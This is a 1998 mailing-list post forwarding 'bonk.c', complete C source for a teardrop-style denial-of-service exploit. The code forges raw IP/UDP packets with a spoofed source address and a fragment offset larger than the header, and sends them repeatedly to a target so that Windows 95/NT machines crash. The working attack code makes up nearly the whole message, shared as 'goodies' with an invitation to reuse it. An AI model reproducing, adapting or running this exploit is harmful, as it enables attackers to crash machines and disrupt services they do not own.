bonk.c

Aleph One (aleph1@DFW.NET)
Thu, 08 Jan 1998 15:17:11 -0600

This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.

--Boundary_(ID_Jw+O0HHexm7CLEFae+EfCw)
Content-id: <Pine.SUN.3.94.980108151612.18345D@dfw.dfw.net>
Content-type: TEXT/PLAIN; CHARSET=us-ascii

Goodies from rootsell.com

http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/bonk.c

/*

[ http://www.rootshell.com/ ]

==bendi - 1998==

bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.

Basically, we set the frag offset > header length (teardrop
reversed). There are many theories as to why this works,
however i do not have the resources to perform extensive testing.
I make no warranties. Use this code at your own risk.
Rip it if you like, i've had my fun.

*/

#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST 0x3
#define PADDING 0x1c

struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;

int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */

void usage(void)
{
fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
exit(0);
}

u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;

res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}

void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;

memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */

pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */

to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;

bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));

pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */

bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));

return bs;
}

void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;

int i,
src_prt=53,
dst_prt=53,
bs = 1,
pkt_count = 10; /* Default amount */

if (argc < 3)
usage();

if (argc == 4)
pkt_count = atoi(argv[3]); /* 10 does the trick */

/* Resolve hostnames */

src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");

spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");

for (i = 0; i < pkt_count; ++i)
{
fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
usleep(10000);
}

printf("Done.\n");
}

--Boundary_(ID_Jw+O0HHexm7CLEFae+EfCw)--